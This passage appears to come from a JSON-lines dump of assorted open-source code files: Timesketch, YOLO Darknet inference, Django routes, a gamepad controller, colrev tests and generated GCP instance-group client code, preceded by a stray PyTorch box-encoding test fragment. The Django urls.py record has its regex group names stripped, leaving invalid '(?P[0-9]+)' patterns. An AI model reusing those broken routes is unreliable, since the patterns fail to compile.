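boxes = torch.tensor([[10., 20., 50., 80.]])
priors = torch.tensor([[32., 48., 40., 56.]])  # illustrative prior in center-size form

# boundary <-> center-size is lossless
assert torch.allclose(cxcy_to_xy(xy_to_cxcy(boxes)), boxes)
# encode w.r.t. a prior, then decode: also lossless
enc = cxcy_to_gcxgcy(xy_to_cxcy(boxes), priors)
assert torch.allclose(gcxgcy_to_cxcy(enc, priors), xy_to_cxcy(boxes))

# IoU of two disjoint boxes is 0 (mirrors find_intersection/find_jaccard_overlap)
a, b = torch.tensor([[0., 0., 10., 10.]]), torch.tensor([[20., 20., 30., 30.]])
inter = torch.clamp(torch.min(a[:, 2:], b[:, 2:]) - torch.max(a[:, :2], b[:, :2]), min=0).prod(1)
union = (a[:, 2:] - a[:, :2]).prod(1) + (b[:, 2:] - b[:, :2]).prod(1) - inter
assert float(inter / union) == 0.0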
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Add Plaso timeline to timesketch\"\"\"\n\nimport os\nimport sys\n\nfrom pyelasticsearch import ElasticSearch\n\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"timesketch.settings\")\nfrom django.contrib.auth.models import User\n\nfrom timesketch.apps.sketch.models import Timeline\n\n\nuser = User.objects.get(id=2)\nes_server = sys.argv[1]\nes_port = sys.argv[2]\nname = sys.argv[3]\nindex = sys.argv[4]\n\nes = ElasticSearch(\"http://%s:%s\" % (es_server, es_port))\n\nmapping = {\n \"plaso_event\": {\n u'properties': {\n u'timesketch_label': {\n \"type\": \"nested\"}\n }\n },\n}\n\nes.put_mapping(index, \"plaso_event\", mapping)\ntimeline = Timeline.objects.create(owner=user, title=name, description=name,\n datastore_index=index)\ntimeline.make_public()\n","sub_path":"utils/add_plaso_timeline.py","file_name":"add_plaso_timeline.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"97228998","text":"from __future__ import division\n\nfrom models.darknet_model import Darknet\nfrom utils.common_util import load_classes, non_max_suppression, rescale_boxes, pad_to_square, resize, create_directory\nfrom PIL import Image\nfrom utils.visulize_util import plot_one_box, get_color_table\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\n\nimport os\nimport time\nimport argparse\nimport cv2\nimport torch\nimport cfg\nimport numpy as np\n\ndef darknet_inference_write_results(img_dirs, model_dir, INPUTSIZE, classes, conf_th = 0.3, via_flag = True, save_flag = True, save_dir = './', cfg_file='./models/yolov3.cfg'):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = Darknet(cfg_file, img_size=INPUTSIZE).to(device)\n if model_dir.endswith(\".weights\"):\n model.load_darknet_weights(model_dir)\n else:\n model.load_state_dict(torch.load(model_dir))\n model.eval()\n file_list = os.listdir(img_dirs)\n color_table = get_color_table(80)\n for img_name in file_list:\n txt_name = img_name.split('.')[0]\n img_paths = os.path.join(img_dirs, img_name)\n assert create_directory(cfg.single_img_result_dir)\n txt_file = open(cfg.single_img_result_dir + txt_name, 'w')\n img_ori = cv2.imread(img_paths)\n img = transforms.ToTensor()(Image.open(img_paths))\n img, _ = pad_to_square(img, 0)\n input_imgs = resize(img, INPUTSIZE)\n input_imgs = Variable(torch.unsqueeze(input_imgs, dim=0).float(), requires_grad=False).cuda()\n with torch.no_grad():\n detections = model(input_imgs)\n detections = non_max_suppression(detections, conf_th, cfg.darknet_nms_th)\n if detections[0] is not None:\n detections = rescale_boxes(detections[0], INPUTSIZE, img_ori.shape[:2])\n for i, (x0, y0, x1, y1, conf, cls_conf, label) in enumerate(detections.numpy()):\n score = cls_conf*conf\n if score >= conf_th:\n src = classes[int(label)] + \" \" + str(round(score, 2)) + \" \" + str(int(x0)) + \" \" + str(int(y0)) 
+ \" \" + str(int(x1)) + \" \" + str(int(y1))\n if i != len(detections) - 1:\n src += '\\n'\n txt_file.write(src)\n plot_one_box(img_ori, [x0, y0, x1, y1], label=classes[int(label)] + ', {:.2f}%'.format(score * 100),\n color=color_table[int(label)])\n if via_flag == True:\n cv2.namedWindow('Detection result', 0)\n cv2.resizeWindow('Detection result', 800, 800)\n cv2.imshow('Detection result', img_ori)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n if save_flag == True:\n cv2.imwrite(save_dir + img_name, img_ori)\n else:\n print(\"current img detect no obj \")\n print(\"img name is\", img_name)\n return 1\n\ndef darknet_model_init(model_dir, INPUTSIZE, cfg_file):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = Darknet(cfg_file, img_size=INPUTSIZE).to(device)\n if model_dir.endswith(\".weights\"):\n model.load_darknet_weights(model_dir)\n else:\n model.load_state_dict(torch.load(model_dir))\n model.eval()\n return model\n\ndef darknet_inference_single_img(model, img_dir, INPUTSIZE, classes, conf_th = 0.3, via_flag = True):\n color_table = get_color_table(80)\n img_ori = cv2.imread(img_dir)\n img = transforms.ToTensor()(Image.open(img_dir))\n img, _ = pad_to_square(img, 0)\n input_imgs = resize(img, INPUTSIZE)\n input_imgs = Variable(torch.unsqueeze(input_imgs, dim=0).float(), requires_grad=False).cuda()\n with torch.no_grad():\n results = []\n detections = model(input_imgs)\n detections = non_max_suppression(detections, conf_th, cfg.darknet_nms_th)\n if detections[0] is not None:\n detections = rescale_boxes(detections[0], INPUTSIZE, img_ori.shape[:2])\n for i, (x0, y0, x1, y1, conf, cls_conf, label) in enumerate(detections.numpy()):\n score = cls_conf * conf\n if score >= conf_th:\n results.append( np.array( [x0, y0, x1, y1, score, label] ) )\n plot_one_box(img_ori, [x0, y0, x1, y1],\n label=classes[int(label)] + ', {:.2f}%'.format(score * 100),\n color=color_table[int(label)])\n if via_flag == True:\n cv2.namedWindow('Detection result', 0)\n cv2.resizeWindow('Detection result', 800, 800)\n cv2.imshow('Detection result', img_ori)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n else:\n print(\"current img detect no obj \")\n print(\"img name is\", img_dir)\n return results\n\nif __name__ == \"__main__\":\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n # darknet_inference_write_results(cfg.img_dir, cfg.darknet_weights, cfg.img_size[0], cfg.names_class, cfg.score_th, cfg.darknet_via_flag, cfg.darknet_save_flag, cfg.darknet_write_img_dir, cfg.darknet_cfg_file)\n model = darknet_model_init(cfg.darknet_weights, 416, cfg.darknet_cfg_file)\n results = darknet_inference_single_img(model, \"/home/pcl/tf_work/map/data/image_shandong/val00002.jpg\", 416, cfg.names_class, cfg.score_th, cfg.darknet_via_flag)\n print(results)","sub_path":"utils/dark_util.py","file_name":"dark_util.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"570394567","text":"from django.conf.urls import url \nfrom django.contrib import admin \n\nfrom . 
import views \n#from django.contrib.auth import login\n\nfrom django.contrib.auth.views import login\n\napp_name = 'mysessions'\n\nurlpatterns= [\n\turl(r'^$', views.index, name ='index'),\n#make href = to the google id of the place; when place clicked, i\n#nstead of defailsview, use something similar to addalbum\n\t#url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n\turl(r'^(?P[0-9]+)/$', views.session, name='session'),\n\turl(r'^(?P[0-9]+)/add/$', views.addPlace, name='addPlace'),\n\turl(r'^(?P[0-9]+)/down/$', views.downvote, name='downVote'),\n\turl(r'^(?P[0-9]+)/up/$', views.upvote, name='upVote'),\n\turl(r'^(?P[0-9]+)/getSelectedList/$', views.getSelectedPlaces, name='getPlaces'),\n\turl(r'^(?P[0-9]+)/getWinner/$', views.getWinner, name='getWinner'),\n\n\n#\turl(r'^login/$', views.login_view)\n\n\t#url(r'^login/$', login, {'template_name': 'mysessions/login.html'})\n\n\t#url(r'^(?P[0-9]+)/vote(?P(?:up|down))/$', views.vote, name='votePlace')\n\n]","sub_path":"mysessions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"573942847","text":"#https://inputs.readthedocs.io/en/latest/user/quickstart.html\nfrom inputs import devices, get_gamepad\nfrom math import pi, cos\n\nfrom _thread import *\nimport threading\n\n#Button codes for a logitech gamepad\n#Trigger buttons: BTN_TL, BTN_TR, ABS_Z, ABS_RZ\n#Gamepad buttons: BTN_WEST, BTN_NORTH, BTN_SOUTH, BTN_EAST\n#Select/start \t: BTN_SELECT, BTN_START\n#Joy Pad \t\t: ABS_HAT0X, ABS_HAT0Y\n#Joysticks\t\t: ABS_X, ABS_Y, ABS_RX, ABS_RY\n\nclass joy_device():\n\tdef __init__(self, device):\n\t\tself.joystick_max_val = 32767\n\t\tself.speed_limit = 10\n\t\tself.deadzone = 10\n\t\tself.gamepad_queue = []\n\t\tself.device_id = device.manager\n\t\tself.gamepad_thread = None\n\t\tself.gamepad_thread_active = False\n\n\tdef queue_gamepad_input(self):\n\t\twhile self.gamepad_thread_active:\n\t\t\tnew_input = self.get_gamepad_input()\n\t\t\tfor item in new_input:\n\t\t\t\tself.gamepad_queue.append(item)\n\t\telse:\n\t\t\tprint(\"gamepad thread stopped\")\n\n\tdef get_gamepad_input(self):\n\t\tlist_events = []\n\t\tevents = get_gamepad()\n\t\tfor event in events:\n\t\t\tif event.device.manager == self.device_id:\n\t\t\t\tlist_events.append({\"event\":event.code,\"value\":event.state})\n\t\treturn list_events\n\n\tdef start_gamepad_thread(self):\n\t\tself.gamepad_thread_active = True\n\t\tself.gamepad_thread = threading.Thread(target=self.queue_gamepad_input)\n\t\tself.gamepad_thread.daemon = True\n\t\tself.gamepad_thread.start()\n\n\tdef stop_gamepad_thread(self):\n\t\tself.gamepad_thread_active = False\n\t\tself.gamepad_thread = None\n\n\tdef pop_gamepad_queue(self):\n\t\tlocal_queue = self.gamepad_queue\n\t\tself.gamepad_queue = []\n\t\treturn local_queue\n\n\tdef normalize_joy(self, val):\n\t #NewValue = (((OldValue - OldMin) * (NewMax - NewMin)) / (OldMax - OldMin)) + NewMin\n\t newval = (((val+self.joystick_max_val)*(self.speed_limit*2))/(2*self.joystick_max_val))-self.speed_limit\n\t #print(newval)\n\t if -2 < newval < 2:\n\t return 0\n\t else:\n\t return newval\n\n\t#https://home.kendra.com/mauser/joystick.html\n\n\tdef mix_joy(self, xval, yval):\n\t newx = (((xval+self.joystick_max_val)*(100*2))/(2*self.joystick_max_val))-100\n\t newy = (((yval+self.joystick_max_val)*(100*2))/(2*self.joystick_max_val))-100\n\n\t if -self.deadzone < newx < self.deadzone:\n\t newx = 0\n\t if -self.deadzone < newy < 
self.deadzone:\n\t newy = 0\n\n\t newx = -1 * newx\n\t V = (100-abs(newx))*(newy/100)+newy\n\t W = (100-abs(newy))*(newx/100)+newx\n\t left = ((V-W)/2)/100\n\t right = ((V+W)/2)/100\n\t #print(f'l: {left} ||| r: {right}')\n\t left = self.speed_limit * left\n\t right = self.speed_limit * right #((newy*limit)/100)\n\n\t return left, right\n\n\tdef stop_thread(self):\n\t\tself.gamepad_thread_active = False","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"117100995","text":"#!/usr/bin/env python\nimport os\nimport shutil\nfrom dataclasses import asdict\nfrom pathlib import Path\n\nimport pytest\n\nimport colrev.env.utils\nimport colrev.review_manager\nimport colrev.settings\n\n# Note : the following produces different relative paths locally/on github.\n# Path(colrev.__file__).parents[1]\n\ntest_data_path = Path()\n\n\ndef retrieve_test_file(*, source: Path, target: Path) -> None:\n target.parent.mkdir(exist_ok=True, parents=True)\n shutil.copy(\n test_data_path / source,\n target,\n )\n\n\n# @pytest.fixture(scope=\"module\")\n@pytest.fixture\ndef review_manager(session_mocker, tmp_path: Path, request) -> colrev.review_manager.ReviewManager: # type: ignore\n global test_data_path\n test_data_path = Path(request.fspath).parents[1] / Path(\"data\")\n\n session_mocker.patch(\n \"colrev.env.environment_manager.EnvironmentManager.get_name_mail_from_git\",\n return_value=(\"Tester Name\", \"tester@email.de\"),\n )\n\n session_mocker.patch(\n \"colrev.env.environment_manager.EnvironmentManager.register_repo\",\n return_value=(),\n )\n\n # test_repo_dir = tmp_path_factory.mktemp(\"test_review_example\") # type: ignore\n test_repo_dir = tmp_path\n os.chdir(test_repo_dir)\n print(test_repo_dir)\n\n review_manager = colrev.review_manager.ReviewManager(\n path_str=str(test_repo_dir), force_mode=True\n )\n review_manager.settings = colrev.settings.load_settings(\n settings_path=test_data_path.parents[1]\n / Path(\"colrev/template/init/settings.json\")\n )\n\n review_manager.settings.project.title = \"topic a - a review\"\n review_manager.get_init_operation(\n review_type=\"literature_review\",\n example=False,\n target_path=test_repo_dir,\n light=True,\n )\n\n # Note: the strategy is to test the workflow and the endpoints separately\n # We therefore deactivate the (most time consuming endpoints) in the following\n review_manager = colrev.review_manager.ReviewManager(\n path_str=str(review_manager.path)\n )\n\n # review_manager.dataset.add_changes(path=Path(\"data/search/test_records.bib\"))\n review_manager.settings.prep.prep_rounds[0].prep_package_endpoints = [\n {\"endpoint\": \"colrev_built_in.source_specific_prep\"},\n ]\n review_manager.settings.sources = []\n\n review_manager.save_settings()\n return review_manager\n\n\n# To create new test datasets, it is sufficient to\n# create the source_filepath and an empty expected_file\n# running the test will update the expected_file\n@pytest.mark.parametrize(\n \"source_filepath, expected_source_identifier, expected_file\",\n [\n (Path(\"ais.txt\"), \"colrev_built_in.ais_library\", Path(\"ais_result.bib\")),\n (Path(\"pubmed.csv\"), \"colrev_built_in.pubmed\", Path(\"pubmed_result.bib\")),\n (Path(\"dblp.bib\"), \"colrev_built_in.dblp\", Path(\"dblp_result.bib\")),\n ],\n)\ndef test_source(\n source_filepath: Path,\n expected_source_identifier: str,\n expected_file: Path,\n review_manager: 
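mix_joy in controller.py above is the classic two-axis 'arcade drive' blend: V carries the forward component, W the (sign-flipped) turn component, and the wheel speeds are their half-difference and half-sum. A standalone numeric check of the blend (a sketch over values already mapped to -100..100, with speed_limit factored out):

def arcade_mix(x, y):
    # x: turn axis, y: forward axis, both in -100..100 (x negated as in mix_joy)
    x = -x
    v = (100 - abs(x)) * (y / 100) + y
    w = (100 - abs(y)) * (x / 100) + x
    return (v - w) / 2 / 100, (v + w) / 2 / 100  # (left, right) in -1..1

assert arcade_mix(0, 100) == (1.0, 1.0)    # stick forward: both wheels full ahead
assert arcade_mix(100, 0) == (1.0, -1.0)   # stick right: spin clockwise in place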
colrev.review_manager.ReviewManager,\n) -> None:\n retrieve_test_file(\n source=Path(\"built_in_search_sources/\") / source_filepath,\n target=Path(\"data/search/\") / source_filepath,\n )\n\n load_operation = review_manager.get_load_operation()\n new_sources = load_operation.get_new_sources(skip_query=True)\n load_operation.main(new_sources=new_sources)\n actual_source_identifier = review_manager.settings.sources[0].endpoint\n\n # This tests the heuristics\n assert expected_source_identifier == actual_source_identifier\n\n prep_operation = review_manager.get_prep_operation()\n prep_operation.main()\n\n # Test whether the load(fixes) and source-specific prep work as expected\n actual = Path(\"data/records.bib\").read_text()\n expected = (\n test_data_path / Path(\"built_in_search_sources/\") / expected_file\n ).read_text()\n\n # If mismatch: copy the actual file to replace the expected file (facilitating updates)\n if expected != actual:\n print(Path.cwd())\n shutil.copy(\n Path(\"data/records.bib\"),\n test_data_path / Path(\"built_in_search_sources/\") / expected_file,\n )\n\n assert expected == actual\n","sub_path":"tests/3_built_in/source_specific_load_prep_test.py","file_name":"source_specific_load_prep_test.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"57399400","text":"# Copyright 2023 Google LLC. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom connector import channel\nfrom google3.cloud.graphite.mmv2.services.google.compute import (\n instance_group_manager_pb2,\n)\nfrom google3.cloud.graphite.mmv2.services.google.compute import (\n instance_group_manager_pb2_grpc,\n)\n\nfrom typing import List\n\n\nclass InstanceGroupManager(object):\n def __init__(\n self,\n id: int = None,\n creation_timestamp: str = None,\n name: str = None,\n description: str = None,\n zone: str = None,\n region: str = None,\n distribution_policy: dict = None,\n instance_template: str = None,\n versions: list = None,\n instance_group: str = None,\n target_pools: list = None,\n base_instance_name: str = None,\n fingerprint: str = None,\n current_actions: dict = None,\n status: dict = None,\n target_size: int = None,\n self_link: str = None,\n auto_healing_policies: list = None,\n update_policy: dict = None,\n named_ports: list = None,\n stateful_policy: dict = None,\n service_account: str = None,\n failover_action: str = None,\n project: str = None,\n location: str = None,\n service_account_file: str = \"\",\n ):\n channel.initialize()\n self.name = name\n self.description = description\n self.distribution_policy = distribution_policy\n self.instance_template = instance_template\n self.versions = versions\n self.target_pools = target_pools\n self.base_instance_name = base_instance_name\n self.target_size = target_size\n self.auto_healing_policies = auto_healing_policies\n self.update_policy = update_policy\n self.named_ports = named_ports\n self.stateful_policy = 
stateful_policy\n self.service_account = service_account\n self.failover_action = failover_action\n self.project = project\n self.location = location\n self.service_account_file = service_account_file\n\n def apply(self):\n stub = (\n instance_group_manager_pb2_grpc.ComputeBetaInstanceGroupManagerServiceStub(\n channel.Channel()\n )\n )\n request = (\n instance_group_manager_pb2.ApplyComputeBetaInstanceGroupManagerRequest()\n )\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceGroupManagerDistributionPolicy.to_proto(self.distribution_policy):\n request.resource.distribution_policy.CopyFrom(\n InstanceGroupManagerDistributionPolicy.to_proto(\n self.distribution_policy\n )\n )\n else:\n request.resource.ClearField(\"distribution_policy\")\n if Primitive.to_proto(self.instance_template):\n request.resource.instance_template = Primitive.to_proto(\n self.instance_template\n )\n\n if InstanceGroupManagerVersionsArray.to_proto(self.versions):\n request.resource.versions.extend(\n InstanceGroupManagerVersionsArray.to_proto(self.versions)\n )\n if Primitive.to_proto(self.target_pools):\n request.resource.target_pools.extend(Primitive.to_proto(self.target_pools))\n if Primitive.to_proto(self.base_instance_name):\n request.resource.base_instance_name = Primitive.to_proto(\n self.base_instance_name\n )\n\n if Primitive.to_proto(self.target_size):\n request.resource.target_size = Primitive.to_proto(self.target_size)\n\n if InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n ):\n request.resource.auto_healing_policies.extend(\n InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n )\n )\n if InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy):\n request.resource.update_policy.CopyFrom(\n InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy)\n )\n else:\n request.resource.ClearField(\"update_policy\")\n if InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports):\n request.resource.named_ports.extend(\n InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports)\n )\n if InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy):\n request.resource.stateful_policy.CopyFrom(\n InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy)\n )\n else:\n request.resource.ClearField(\"stateful_policy\")\n if Primitive.to_proto(self.service_account):\n request.resource.service_account = Primitive.to_proto(self.service_account)\n\n if InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action):\n request.resource.failover_action = (\n InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action)\n )\n\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n request.service_account_file = self.service_account_file\n\n response = stub.ApplyComputeBetaInstanceGroupManager(request)\n self.id = Primitive.from_proto(response.id)\n self.creation_timestamp = Primitive.from_proto(response.creation_timestamp)\n self.name = Primitive.from_proto(response.name)\n self.description = Primitive.from_proto(response.description)\n self.zone = Primitive.from_proto(response.zone)\n self.region = Primitive.from_proto(response.region)\n self.distribution_policy = 
InstanceGroupManagerDistributionPolicy.from_proto(\n response.distribution_policy\n )\n self.instance_template = Primitive.from_proto(response.instance_template)\n self.versions = InstanceGroupManagerVersionsArray.from_proto(response.versions)\n self.instance_group = Primitive.from_proto(response.instance_group)\n self.target_pools = Primitive.from_proto(response.target_pools)\n self.base_instance_name = Primitive.from_proto(response.base_instance_name)\n self.fingerprint = Primitive.from_proto(response.fingerprint)\n self.current_actions = InstanceGroupManagerCurrentActions.from_proto(\n response.current_actions\n )\n self.status = InstanceGroupManagerStatus.from_proto(response.status)\n self.target_size = Primitive.from_proto(response.target_size)\n self.self_link = Primitive.from_proto(response.self_link)\n self.auto_healing_policies = (\n InstanceGroupManagerAutoHealingPoliciesArray.from_proto(\n response.auto_healing_policies\n )\n )\n self.update_policy = InstanceGroupManagerUpdatePolicy.from_proto(\n response.update_policy\n )\n self.named_ports = InstanceGroupManagerNamedPortsArray.from_proto(\n response.named_ports\n )\n self.stateful_policy = InstanceGroupManagerStatefulPolicy.from_proto(\n response.stateful_policy\n )\n self.service_account = Primitive.from_proto(response.service_account)\n self.failover_action = InstanceGroupManagerFailoverActionEnum.from_proto(\n response.failover_action\n )\n self.project = Primitive.from_proto(response.project)\n self.location = Primitive.from_proto(response.location)\n\n def delete(self):\n stub = (\n instance_group_manager_pb2_grpc.ComputeBetaInstanceGroupManagerServiceStub(\n channel.Channel()\n )\n )\n request = (\n instance_group_manager_pb2.DeleteComputeBetaInstanceGroupManagerRequest()\n )\n request.service_account_file = self.service_account_file\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceGroupManagerDistributionPolicy.to_proto(self.distribution_policy):\n request.resource.distribution_policy.CopyFrom(\n InstanceGroupManagerDistributionPolicy.to_proto(\n self.distribution_policy\n )\n )\n else:\n request.resource.ClearField(\"distribution_policy\")\n if Primitive.to_proto(self.instance_template):\n request.resource.instance_template = Primitive.to_proto(\n self.instance_template\n )\n\n if InstanceGroupManagerVersionsArray.to_proto(self.versions):\n request.resource.versions.extend(\n InstanceGroupManagerVersionsArray.to_proto(self.versions)\n )\n if Primitive.to_proto(self.target_pools):\n request.resource.target_pools.extend(Primitive.to_proto(self.target_pools))\n if Primitive.to_proto(self.base_instance_name):\n request.resource.base_instance_name = Primitive.to_proto(\n self.base_instance_name\n )\n\n if Primitive.to_proto(self.target_size):\n request.resource.target_size = Primitive.to_proto(self.target_size)\n\n if InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n ):\n request.resource.auto_healing_policies.extend(\n InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n )\n )\n if InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy):\n request.resource.update_policy.CopyFrom(\n InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy)\n )\n else:\n request.resource.ClearField(\"update_policy\")\n if InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports):\n 
request.resource.named_ports.extend(\n InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports)\n )\n if InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy):\n request.resource.stateful_policy.CopyFrom(\n InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy)\n )\n else:\n request.resource.ClearField(\"stateful_policy\")\n if Primitive.to_proto(self.service_account):\n request.resource.service_account = Primitive.to_proto(self.service_account)\n\n if InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action):\n request.resource.failover_action = (\n InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action)\n )\n\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n response = stub.DeleteComputeBetaInstanceGroupManager(request)\n\n @classmethod\n def list(self, project, location, service_account_file=\"\"):\n stub = (\n instance_group_manager_pb2_grpc.ComputeBetaInstanceGroupManagerServiceStub(\n channel.Channel()\n )\n )\n request = (\n instance_group_manager_pb2.ListComputeBetaInstanceGroupManagerRequest()\n )\n request.service_account_file = service_account_file\n request.Project = project\n\n request.Location = location\n\n return stub.ListComputeBetaInstanceGroupManager(request).items\n\n def to_proto(self):\n resource = instance_group_manager_pb2.ComputeBetaInstanceGroupManager()\n if Primitive.to_proto(self.name):\n resource.name = Primitive.to_proto(self.name)\n if Primitive.to_proto(self.description):\n resource.description = Primitive.to_proto(self.description)\n if InstanceGroupManagerDistributionPolicy.to_proto(self.distribution_policy):\n resource.distribution_policy.CopyFrom(\n InstanceGroupManagerDistributionPolicy.to_proto(\n self.distribution_policy\n )\n )\n else:\n resource.ClearField(\"distribution_policy\")\n if Primitive.to_proto(self.instance_template):\n resource.instance_template = Primitive.to_proto(self.instance_template)\n if InstanceGroupManagerVersionsArray.to_proto(self.versions):\n resource.versions.extend(\n InstanceGroupManagerVersionsArray.to_proto(self.versions)\n )\n if Primitive.to_proto(self.target_pools):\n resource.target_pools.extend(Primitive.to_proto(self.target_pools))\n if Primitive.to_proto(self.base_instance_name):\n resource.base_instance_name = Primitive.to_proto(self.base_instance_name)\n if Primitive.to_proto(self.target_size):\n resource.target_size = Primitive.to_proto(self.target_size)\n if InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n ):\n resource.auto_healing_policies.extend(\n InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n )\n )\n if InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy):\n resource.update_policy.CopyFrom(\n InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy)\n )\n else:\n resource.ClearField(\"update_policy\")\n if InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports):\n resource.named_ports.extend(\n InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports)\n )\n if InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy):\n resource.stateful_policy.CopyFrom(\n InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy)\n )\n else:\n resource.ClearField(\"stateful_policy\")\n if Primitive.to_proto(self.service_account):\n resource.service_account = 
Primitive.to_proto(self.service_account)\n if InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action):\n resource.failover_action = InstanceGroupManagerFailoverActionEnum.to_proto(\n self.failover_action\n )\n if Primitive.to_proto(self.project):\n resource.project = Primitive.to_proto(self.project)\n if Primitive.to_proto(self.location):\n resource.location = Primitive.to_proto(self.location)\n return resource\n\n\nclass InstanceGroupManagerDistributionPolicy(object):\n def __init__(self, zones: list = None, target_shape: str = None):\n self.zones = zones\n self.target_shape = target_shape\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicy()\n )\n if InstanceGroupManagerDistributionPolicyZonesArray.to_proto(resource.zones):\n res.zones.extend(\n InstanceGroupManagerDistributionPolicyZonesArray.to_proto(\n resource.zones\n )\n )\n if InstanceGroupManagerDistributionPolicyTargetShapeEnum.to_proto(\n resource.target_shape\n ):\n res.target_shape = (\n InstanceGroupManagerDistributionPolicyTargetShapeEnum.to_proto(\n resource.target_shape\n )\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerDistributionPolicy(\n zones=InstanceGroupManagerDistributionPolicyZonesArray.from_proto(\n resource.zones\n ),\n target_shape=InstanceGroupManagerDistributionPolicyTargetShapeEnum.from_proto(\n resource.target_shape\n ),\n )\n\n\nclass InstanceGroupManagerDistributionPolicyArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerDistributionPolicy.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerDistributionPolicy.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerDistributionPolicyZones(object):\n def __init__(self, zone: str = None):\n self.zone = zone\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicyZones()\n )\n if Primitive.to_proto(resource.zone):\n res.zone = Primitive.to_proto(resource.zone)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerDistributionPolicyZones(\n zone=Primitive.from_proto(resource.zone),\n )\n\n\nclass InstanceGroupManagerDistributionPolicyZonesArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerDistributionPolicyZones.to_proto(i) for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerDistributionPolicyZones.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerVersions(object):\n def __init__(\n self, name: str = None, instance_template: str = None, target_size: dict = None\n ):\n self.name = name\n self.instance_template = instance_template\n self.target_size = target_size\n\n @classmethod\n def to_proto(self, resource):\n if not 